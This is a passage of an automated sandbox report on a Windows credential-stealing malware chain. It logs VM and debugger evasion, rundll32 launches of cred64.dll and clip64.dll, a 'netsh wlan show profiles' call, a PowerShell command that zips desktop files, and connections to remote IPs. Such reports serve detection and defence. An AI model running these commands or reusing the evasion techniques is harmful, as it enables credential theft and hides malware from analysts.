Source: MPGPH131.exe, 00000026.00000002.2749346705.00000000013D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000JUy0
Source: 590971cd60.exe, 00000014.00000002.2895159707.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _vmware
Source: explorha.exe, 00000006.00000002.2899294419.0000000000700000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2527620455.0000022BD7150000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2527620455.0000022BD7214000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2900366826.000000000066D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.2900366826.0000000000699000.00000004.00000020.00020000.00000000.sdmp, chrosha.exe, 00000010.00000002.2907399446.000000000104B000.00000004.00000020.00020000.00000000.sdmp, chrosha.exe, 00000010.00000002.2907399446.0000000001001000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2910577091.0000019EC9C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2921881125.0000019ECF258000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: bad48ea9ac.exe, 0000000F.00000003.2687671932.0000000003E47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: MPGPH131.exe, 00000026.00000003.2572826280.00000000013ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: 590971cd60.exe, 00000014.00000002.2895159707.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \?\scsi_vmwaretual_dif219&0&3f563070-94f2-b8b}t
Source: netsh.exe, 00000009.00000003.2363267427.0000022A82527000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 590971cd60.exe, 00000014.00000003.2630721503.0000000007F0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Z@
Source: netsh.exe, 00000018.00000003.2496911308.00000203057B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllaa
Source: 590971cd60.exe, 00000014.00000003.2630721503.0000000007F0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_3DC1DCF1
Source: 590971cd60.exe, 00000014.00000003.2630675144.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: i#disk&ven_vmware&pro
Source: 590971cd60.exe, 00000014.00000003.2596974102.0000000007F8D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}ta\*
Source: bad48ea9ac.exe, 0000001F.00000002.2819404632.0000000003F66000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}H
Source: rundll32.exe, 0000001A.00000002.2899487024.000000000061A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: MPGPH131.exe, 00000026.00000002.2749346705.00000000013EF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Ey0
Source: 590971cd60.exe, 00000014.00000002.2888771295.000000000180E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&>'
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: UeW2b6mU6Z.exe, 00000000.00000002.1671998691.0000000000E40000.00000040.00000001.01000000.00000003.sdmp, UeW2b6mU6Z.exe, 00000000.00000000.1624553446.0000000000E40000.00000080.00000001.01000000.00000003.sdmp, explorha.exe, 00000001.00000002.1703565671.0000000000CD0000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000001.00000000.1654835716.0000000000CD0000.00000080.00000001.01000000.00000007.sdmp, explorha.exe, 00000002.00000000.1662078999.0000000000CD0000.00000080.00000001.01000000.00000007.sdmp, explorha.exe, 00000002.00000002.1711422496.0000000000CD0000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000006.00000002.2910760294.0000000000CD0000.00000040.00000001.01000000.00000007.sdmp, explorha.exe, 00000006.00000000.2298675469.0000000000CD0000.00000080.00000001.01000000.00000007.sdmp, amert.exe, 0000000C.00000002.2419990538.0000000000EFF000.00000040.00000001.01000000.0000000B.sdmp, chrosha.exe, 00000010.00000002.2898369234.000000000091F000.00000040.00000001.01000000.00000011.sdmp, 590971cd60.exe, 00000014.00000002.2887101333.0000000000E52000.00000040.00000001.01000000.00000014.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
Source: 590971cd60.exe, 00000014.00000003.2630721503.0000000007F0D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}J6HEdjEHUub5EtqTQ2dk3wwrCNfruTWZeEqONRrqgXAW0ke6pZXg==_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=*
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Thread information set: HideFromDebugger
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_054708F6 Start: 05470966 End: 05470948 0_2_054708F6
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_05470C1D rdtsc 0_2_05470C1D
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B0E110 LdrInitializeThunk,_strrchr,__alldvrm,__alldvrm,__alldvrm, 6_2_00B0E110
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C77BBB mov eax, dword ptr fs:[00000030h] 0_2_00C77BBB
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C7B922 mov eax, dword ptr fs:[00000030h] 0_2_00C7B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B0B922 mov eax, dword ptr fs:[00000030h] 1_2_00B0B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B07BBB mov eax, dword ptr fs:[00000030h] 1_2_00B07BBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B0B922 mov eax, dword ptr fs:[00000030h] 2_2_00B0B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B07BBB mov eax, dword ptr fs:[00000030h] 2_2_00B07BBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B0B922 mov eax, dword ptr fs:[00000030h] 6_2_00B0B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B07BBB mov eax, dword ptr fs:[00000030h] 6_2_00B07BBB
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.167 80
Tries to shutdown other security tools via broadcasted WM_QUERYENDSESSION
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Message posted: Message id: QUERYENDSESSION
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe "C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe "C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: bad48ea9ac.exe, 0000000F.00000000.2408172800.00000000008C2000.00000002.00000001.01000000.00000010.sdmp, bad48ea9ac.exe, 0000001F.00000002.2814535383.00000000008C2000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorha.exe, explorha.exe, 00000006.00000002.2914750366.0000000000D18000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: 6Program Manager
Source: amert.exe, 0000000C.00000002.2419990538.0000000000EFF000.00000040.00000001.01000000.0000000B.sdmp, chrosha.exe, 00000010.00000002.2898369234.000000000091F000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: oProgram Manager
Source: MPGPH131.exe, 00000026.00000002.2747934122.0000000000902000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: w~Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AEF436 cpuid 6_2_00AEF436
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000055001\bad48ea9ac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\AIXACVYBSB.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\DTBZGIOOSO.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\NHPKIZUUSG.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\XZXHAVGRAG.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
